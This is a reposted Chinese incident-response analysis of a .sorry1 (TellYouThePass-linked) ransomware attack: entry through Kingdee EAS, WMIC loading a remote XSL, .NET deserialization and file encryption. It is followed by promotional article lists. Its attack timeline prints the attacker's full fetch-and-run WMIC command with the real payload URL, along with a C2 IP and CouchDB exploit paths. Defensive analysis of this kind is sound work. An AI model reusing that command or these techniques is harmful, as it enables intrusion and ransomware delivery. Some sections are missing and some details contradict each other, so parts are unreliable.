文章总结: 本文基于Solar应急响应团队的真实应急案例,详细拆解了在无安全设备、无流量日志、无Web访问日志的极限环境下,对疑似国内黑产组织的.sorry1变种勒索病毒进行深度溯源的全过程。文章指出攻击者利用金蝶EAS7.0SP3版本的代码执行漏洞作为入口,通过WMIC工具远程加载XSL样式表文件,并利用.NET反序列化技术执行恶意载荷。文章还披露了攻击者使用阿里云存储桶等国内基础设施的痕迹,为安全从业者提供了在类似场景下的应急响应和溯源思路。 综合评分: 90 文章分类: 应急响应,漏洞分析,恶意软件,红队,内网渗透
3.4 恶意行为详细分析
3.4.1 文件加密行为
勒索软件启动后,会遍历系统磁盘,根据内置的扩展名列表筛选目标文件。加密过程采用分块流式处理(StreamChunk),对大型文件设置阈值(LargeFileThreshold),超过阈值的文件采用特殊的分段加密策略。加密完成后,文件会被添加 .sorry1 扩展名。
3.4.2 C2 通信与数据外泄
样本在加密操作开始前,会收集目标系统的关键信息并通过网络回传至 C2 服务器。收集的信息包括:
- 主机名(通过
BuildHostnameInfo函数构建) - 系统环境变量与用户信息
- 处理器数量(用于评估目标价值)
- 加密后的会话私钥(使用攻击者 RSA 公钥加密)
网络通信使用 HTTP 协议,伪装成正常的 GET 请求,回传数据嵌入在请求参数中。C2 服务器地址为:165.22.77.41
3.4.3 系统服务操作
为确保加密过程不受干扰,样本会尝试停止与数据备份和恢复相关的系统服务:
| 服务名 | 说明 | | — | — | | MSSQLSERVER | Microsoft SQL Server 主服务 | | ReportServer | SQL Server 报表服务 | | SQLTELEMETRY | SQL Server 遥测服务 | | SQLWriter | SQL Server VSS 写入服务 | | RabbitMQ | 消息队列服务 | | MSOLAPService | SQL Server OLAP 服务 |
通过停止这些服务,攻击者确保数据库文件处于非锁定状态,可以被加密修改。
3.4.4 勒索信投递
加密完成后,样本会在每个被加密的目录中释放勒索信文件(README.md)。与其他勒索家族不同,该勒索信包含暗网链接或 TOX ID,而是引导受害者前往淘宝平台搜索特定关键词购买解密密钥。
5.2 按时间线筛选可疑文件
我们将存储桶中 2026 年 4 月至 6 月期间上传的文件按时间排序后批量下载,进行逐一分析。以下是我们发现的关键文件:
文件 4:0015_20260602_153846_install32.svg
文件头分析确认,这个 .svg 文件实际上是一个完整的 Windows 可执行文件(PE 格式)。
战术分析:这是典型的”寄生虫”黑帽 SEO 手法。黑客利用阿里云 aliyuncs.com 极高的搜索引擎权重,大量上传这些包含特定关键词的 HTML。当普通用户在百度或谷歌搜索相关词汇时,这些网页会排在前面,点进去就会被跳转到境外博彩或色情网站。
这种手法的存在,可能预示着此 OSS 存储桶被不同的黑产组织攻击后控制,用于各自不同的非法用途:有的拿来分发勒索载荷,有的拿来做黑帽 SEO。或者,本次 TellYouThePass 勒索组织内部有明确的分工,不同”部门”负责不同工序的黑灰产业务。
5.4 蚁剑截图:国内攻击者的”签名”
在存储桶中,我们还发现了一张极具辨识度的截图文件:0024_20260409_114412_abc.png。
这张图片的上传时间是 2026 年 4 月 9 日 11:11,画面显示的是攻击者在使用蚁剑(中国菜刀的替代工具)客户端连接一句话木马时,自动生成的、经过 URL 编码的 PHP 执行指令。
5.5 更多发现:自动化载荷与漏洞利用痕迹
在对存储桶文件做进一步分析时,我们还发现了以下值得注意的内容:
1. 疑似 C2 框架的自动化 Payload:
存储桶中存在大量大小惊人一致的文件(约 11970 字节),文件名呈现 3 级随机目录结构(如 13y/IicxKj/qZjg1u6R)。这种高度结构化的命名和统一的文件大小,绝对不是人类手动上传的,而是某种 C2 框架(如 Cobalt Strike、Sliver)或僵尸网络的自动化 Payload 生成器产物。
2. Apache CouchDB 漏洞利用载荷:
在文件列表中发现了 _config/query_servers/cmd 和 _users/org.couchdb.user:guest1 等路径。这是极其典型的 Apache CouchDB 远程命令执行漏洞(CVE-2017-12636)的利用载荷:攻击者甚至把 OSS 当成了漏洞利用配置的存储端。
3. 新版 XSL 变种:
列表中出现了 config.xsl 和 config(均在 2026 年 6 月 5 日更新),这可能是 new.xsl 的后续版本,或者是用于不同攻击场景的配置投递文件。
六、攻击链全景还原与攻击者画像
6.1 完整攻击链推演
综合以上所有溯源信息,我们将本次攻击的完整链条还原如下:
| 阶段 | 时间节点 | 关键动作 | 证据来源 |
| — | — | — | — |
| 侦察探测 | 攻击前 1~2 天 | 攻击者通过网络空间测绘或漏洞扫描,发现目标暴露的金蝶 EAS 7.0 SP3 存在代码执行漏洞 | 金蝶 EAS 版本确认 + 漏洞验证 |
| 初始入侵 | 2026-06-05 00:37 前 | 利用金蝶 EAS 代码执行漏洞,执行系统命令,通过 WMIC 远程加载 XSL 文件 | Defender 查杀日志(WMIC.exe) |
| 载荷投递 | 2026-06-05 00:37:52 | wmic process get /format:"``http://migusto.oss-us-east-1.aliyuncs.com/new.xsl``" | WebCacheV01.dat 中提取的 URL |
| 缓存落地 | 同一秒 | WinINet 自动将 XSL 缓存到 INetCache\IE\0NOWIZK4\new[1].xsl | Defender 查杀路径 |
| 内存执行 | 缓存后立即 | XSL 内嵌 JScript 执行,通过 .NET 反序列化加载 FileEncryptor20.dll | 逆向分析确认 |
| C2 回连 | 加密前 | 向 165.22.77.41 回传受害者信息 | 逆向分析中提取的 C2 地址 |
| 服务停止 | 加密前 | 停止 MSSQLSERVER、SQLWriter 等数据库相关服务 | 逆向分析中的服务列表 |
| 文件加密 | 2026-06-05 00:37 起 | 对超过 200 种扩展名的高价值文件进行 AES-GCM + RSA-2048 混合加密 | 被加密文件时间戳 |
| 勒索信投递 | 加密完成后 | 在每个被加密目录释放 README.md,引导受害者前往淘宝或TOX购买密钥 | 勒索信内容 |
6.2 攻击者画像:为什么高度疑似国内黑产组织
基于本次溯源的全部证据,我们从多个维度对攻击者进行了画像分析:
1.工具偏好(最强证据)
- 使用蚁剑(AntSword)作为 WebShell 管理工具:蚁剑是国内开发、国内流行的工具,在国际黑产圈中知名度远低于 Cobalt Strike、Metasploit 等
- 使用阿里云 OSS 作为载荷分发平台:选择国内云厂商,说明攻击者对国内网络环境的可达性和审核机制更为熟悉
2.语言与文化特征
- 存储桶中的文件命名大量使用中文拼音(
woainilaohu、laohuaini等) - “老虎”等词汇属于国内黑产圈特有的黑话体系
- 勒索信引导受害者前往淘宝购买密钥,而非暗网或加密货币:说明攻击者深谙国内受害者的支付习惯和心理预期
3.作案时间与作息规律
- 蚁剑截图的拍摄时间为北京时间 2026 年 4 月 9 日 11:11(上午工作时间)
- 攻击执行时间为凌晨 00:37(典型的国内黑产”夜间作业”模式)
- 整体作息规律符合国内时区
4.技术能力评估
- 能够利用金蝶 EAS 的代码执行漏洞进行初始入侵:具备基本的漏洞利用能力
- 熟练运用 XSL + WMIC 的无文件攻击技术:具备一定的免杀和对抗经验
- 对 .NET 反序列化漏洞的利用相当成熟:具备逆向分析和 Payload 开发能力
- 使用阿里云 OSS 做”水坑”式载荷分发:具备一定的基础设施运营能力
- 劫持企业 OSS 存储桶作为免费分发平台:说明攻击者可能具备扫描和 exploiting 云配置漏洞的能力
5.运营特征
- 存储桶中存在从 2021 年到 2026 年的长期文件残留:说明这个 OSS 可能被长期控制和使用
- 文件类型涵盖勒索载荷、黑帽 SEO、博彩跳转等多种黑灰产业务:说明攻击者或攻击组织可能同时运营多条业务线
- 存在大量自动化生成的 Payload:说明具备一定的工具链开发和自动化运营能力
综合判断:本次攻击的作案手法、工具偏好、文化特征和运营方式,均与国内黑产组织的常见画像高度吻合。攻击者大概率是一个以国内为活动基地、熟悉国内网络环境和受害者特征、具备中等偏上技术能力的黑产团伙。
 | 09b543d8c36bf20a70c4884c80957442 |
| 恶意文件 MD5(user.svg) | 30374ddbddc6691453845bc1c84894a2 |
| 恶意文件MD5(install32.svg) | e53b9e49f21d06d08fa513d553bdd72a |</p>
<blockquote>
<p><strong>本文案例由 Solar 应急响应团队共同完成。</strong></p>
<p>应急溯源、分析与文章输出:州弟学安全(徐龙州)</p>
<p>文章排版与编辑:超级油麦</p>
</blockquote>
<p><img decoding=)
在企业日常的安全运维中,突发勒索病毒往往让人措手不及。遇到这种情况,正确的应急响应流程能够最大程度控制影响范围、降低数据损失。
这里为大家准备了一张完整的《勒索病毒应急处置指南》长图,建议各位安全从业者和IT运维人员收藏备用。如遇突发情况,请保持冷静,参考本图进行快速、规范的处置
附加资料下载: 防御与响应同样重要。扫描图末的二维码,还可以直接获取完整的《2025年勒索病毒年报》以及《勒索处置一体化》等专业文件,帮助大家深入了解当前的威胁趋势,提前做好防御规划。
安全无小事,掌握科学的处置流程,是我们应对突发安全事件最有效的武器。
以下是solar安全团队近期处理过的常见勒索病毒后缀:
| | | | | — | — | — | | 收录时间 | 病毒家族 | 相关文章 | | 2025/01/14 | Medusalocker | 【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析 【病毒分析】新版勒索病毒MEDUSA LOCKER 首发深度分析 | | 2025/01/15 | Medusa | 【病毒分析】“美杜莎”勒索家族:从入侵到结束的全流程深度解析 | | 2024/12/11 | weaxor | 【病毒分析】新崛起的weaxor勒索家族:疑似mallox家族衍生版,深度解析两者关联! | | 2024/10/23 | RansomHub | 【病毒分析】Ransom Hub:唯一不攻击中国的2024全球Top1勒索家族——ESXi加密器深度解析 | | 2024/11/23 | Fx9 | 【病毒分析】Fx9家族首次现身!使用中文勒索信,熟练勒索谈判 | | 2024/11/04 | Makop | 【病毒分析】揭秘.mkp后缀勒索病毒!Makop家族变种如何进行可视化加密? | | 2024/06/26 | moneyistime | 【病毒分析】使用中文勒索信及沟通:MoneyIsTime 勒索家族的本地化语言转变及其样本分析 | | 2024/04/11 | babyk | 【病毒分析】BabyK加密器分析-Windows篇 【病毒分析】Babyk加密器分析-NAS篇 【病毒分析】Babyk加密器分析-EXSI篇 【病毒分析】Babuk家族babyk勒索病毒分析 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 | | 2024/09/29 | lol | 【病毒分析】全网首发!全面剖析.LOL勒索病毒,无需缴纳赎金,破解方案敬请期待下篇! 【工具分享】.LOL勒索病毒再也不怕!完整破解教程分享+免费恢复工具首发 | | 2024/06/10 | MBRlock | 【病毒分析】假冒游戏陷阱:揭秘MBRlock勒索病毒及其修复方法 | | 2024/06/01 | Rast gang | 【病毒分析】Steloj勒索病毒分析 | | 2024/06/01 | TargetOwner | 【病毒分析】技术全面升级,勒索赎金翻倍,新版本TargetOwner勒索家族强势来袭? | | 2024/11/02 | Lockbit 3.0 | 【病毒分析】Lockbit家族Lockbit 3.0加密器分析 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 【病毒分析】繁体勒索信暗藏玄机!要价50万RMB赎金的Lockbit泄露版分析 | | 2024/05/15 | Wormhole | 【病毒分析】Wormhole勒索病毒分析 | | 2024/03/20 | tellyouthepass | 【病毒分析】locked勒索病毒分析 【病毒分析】中国人不骗中国人?_locked勒索病毒分析 | | 2024/03/01 | lvt | 【病毒分析】交了赎金也无法恢复–针对国内某知名NAS的LVT勒索病毒最新分析 | | 2024/03/04 | phobos | 【病毒分析】phobos家族2700变种加密器分析报告 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 【病毒分析】phobos家族faust变种加密器分析 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 【病毒分析】phobos家族Elbie变种加密器分析报告 | | 2024/03/28 | DevicData | 【病毒分析】DevicData勒索病毒分析 【病毒分析】DevicData家族扩散:全球企业和机构成为勒索病毒头号攻击目标! | | 2024/02/27 | live | 【病毒分析】独家揭秘LIVE勒索病毒家族之1.0(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之1.5(全版本可解密) 【病毒分析】独家揭秘LIVE勒索病毒家族之2.0(全版本可解密) | | 2024/08/16 | CryptoBytes | 【独家破解】揭秘境外黑客组织的20美元锁机病毒:深度逆向分析+破解攻略!赎金?给你付个🥚 | | 2024/03/15 | mallox | 【病毒分析】mallox家族malloxx变种加密器分析报告 【病毒分析】Mallox勒索家族新版本:加密算法全面解析 【病毒分析】全网首发!袭扰国内top1勒索病毒家族Mallox家族破解思路及技术分享 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 【病毒分析】mallox家族rmallox变种加密器分析报告 【病毒分析】Mallox家族再进化:首次瞄准Linux,勒索新版本全面揭秘! | | 2024/07/25 | BeijngCrypt | 【病毒分析】全网首发!以国内某安全厂商名字为后缀的勒索病毒分析 | | 2025/03/11 | 银狐 | 【病毒分析】潜伏在AI工具中的幽灵:银狐家族社工攻击的深度剖析 | | 2025/03/07 | CTF赛题 | 【病毒分析】伪造微软官网+勒索加密+支付威胁,CTF中勒索病毒解密题目真实还原! 【病毒分析】2024年网鼎杯朱雀组REVERSE02——关于勒索木马解密详解 | | 2025/05/14 | 888 | 【病毒分析】888勒索家族再出手!幕后加密器深度剖析 | | 2025/06/13 | LockBit4.0 | 【病毒分析】缴纳了巨额赎金依旧无法解密?最新LockBit4.0解密器分析 【病毒分析】LockBit 4.0 vs 3.0:技术升级还是品牌续命?最新LockBit 4.0分析报告 |
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且衍生了多个分支团队,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库漏洞,如(mssql命令执行)及暴力破解进行加密,攻击手法极多防不胜防。
| | | | — | — | | 收录时间 | 相关文章 | | 2024/12/12 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第二篇-流量致盲,无声突破 | | 2024/12/11 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线:第一篇-驱动漏洞一击致命 |
有效的预防方法包括针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。
| | | | — | — | | 收录时间 | 相关文章 | | 2024/06/27 | 【教程分享】勒索病毒来袭!教你如何做好数据防护 | | 2024/06/24 | 【教程分享】服务器数据文件备份教程 |
案例介绍篇聚焦于真实的攻击事件,还原病毒家族的攻击路径和策略,为用户提供详细的溯源分析和防护启示;
| | | | — | — | | 收录时间 | 相关文章 | | 2024/06/27 | 【案例介绍】赎金提高,防御失效:某上市企业两年内两度陷入同一勒索团伙之手 | | 2024/01/26 | 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 | | 2024/03/13 | 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 | | 2024/04/01 | 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 | | 2024/04/26 | 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 | | 2024/05/17 | 【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 | | 2024/11/28 | 【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 | | 2025/10/23 | 【成功案例】成功挫败 888 勒索家族历时半年的百万赎金勒索,应急处置全流程高效修复,避免千万损失并获客户赠送锦旗 |
漏洞与预防篇侧重于技术层面的防御手段,针对病毒利用的漏洞和安全弱点,提出操作性强的应对方案:
| | | | — | — | | 收录时间 | 相关文章 | | 2025/01/08 | 【漏洞与预防】RDP弱口令漏洞预防 | | 2025/01/21 | 【漏洞与预防】MSSQL数据库弱口令漏洞预防 | | 2025/02/18 | 【漏洞与预防】远程代码执行漏洞预防 | | 2025/04/10 | 【漏洞与预防】Atlassian Confluence存在远程代码执行漏洞 | | 2025/04/17 | 【漏洞与预防】畅捷通文件上传漏洞预防 | | 2025/05/27 | 【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防 | | 2025/09/02 | 【漏洞与预防】Redis CVE-2025-32023 RCE漏洞验证与预防 |
应急响应工具教程篇重点分享应急响应过程中常用工具的安装、配置与使用说明,旨在帮助读者快速掌握这些工具的操作流程与技巧,提高其在实际应急场景中的应用熟练度与效率。
| | | | — | — | | 收录时间 | 相关文章 | | 2025/01/10 | 【应急响应工具教程】Splunk安装与使用 | | 2025/02/07 | 【应急响应工具教程】取证工具-Volatility安装与使用 | | 2025/02/20 | 【应急响应工具教程】流量嗅探工具-Tcpdump | | 2025/02/26 | 【应急响应工具教程】一款精准搜索文件夹内容的工具–FileSeek | | 2025/03/03 | 【应急响应工具教程】一款自动化分析网络安全应急响应工具–FindAll | | 2025/03/13 | 【应急响应工具教程】Windows 系统操作历史监控与审计工具-LastActivityView | | 2025/03/20 | 【应急响应工具教程】镜像取证之挂载镜像——Arsenal Image Mounter | | 2025/04/03 | 【应急响应工具教程】Windows 系统综合排查工具Hawkeye | | 2025/04/08 | 【应急响应工具教程】Linux下应急响应工具whohk | | 2025/05/15 | 【应急响应工具教程】Windows日志快速分析工具——Chainsaw | | 2025/06/05 | 【应急响应工具教程】Logman 系统性能与日志采集工具 | | 2025/07/02 | 【应急响应工具教程】QDoctor应急响应神器:一键检测系统安全 | | 2025/07/08 | 【应急响应工具教程】Linux应急响应工具集:一键式安全评估与可视化报告系统 | | 2025/07/23 | 【应急响应工具教程】司稽(Whoamifuck):纯Shell打造的Linux应急响应利器 | | 2025/08/05 | 【应急响应工具教程】主机侧Checklist的自动全面化检测脚本-GScan | | 2025/08/19 | 【应急响应工具教程】SPECTR3:通过便携式 iSCSI 实现远程证据的只读获取与分析 |
如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“Solar应急响应团队”。
全国热线| 400-613-6816
更多资讯| 扫码加入群组交流
喜欢此内容的人还喜欢
【紧急警示】Weaxor最新变种“.wxx”来袭,批量入国内知名财务类管理系统发起勒索攻击!
Solar应急响应团队
【病毒分析】新版勒索病毒MEDUSA LOCKER 首发深度分析
Solar应急响应团队
【成功案例】成功挫败 888 勒索家族历时半年的百万赎金勒索,应急处置全流程高效修复,避免千万损失并获客户赠送锦旗 Solar应急响应团队
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:solar应急响应团队 州弟学安全 州弟学安全《【万字首发】零安全设备零日志环境下的极限溯源,疑似国内黑产组织的.sorry1变种勒索病毒攻击链全拆解》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论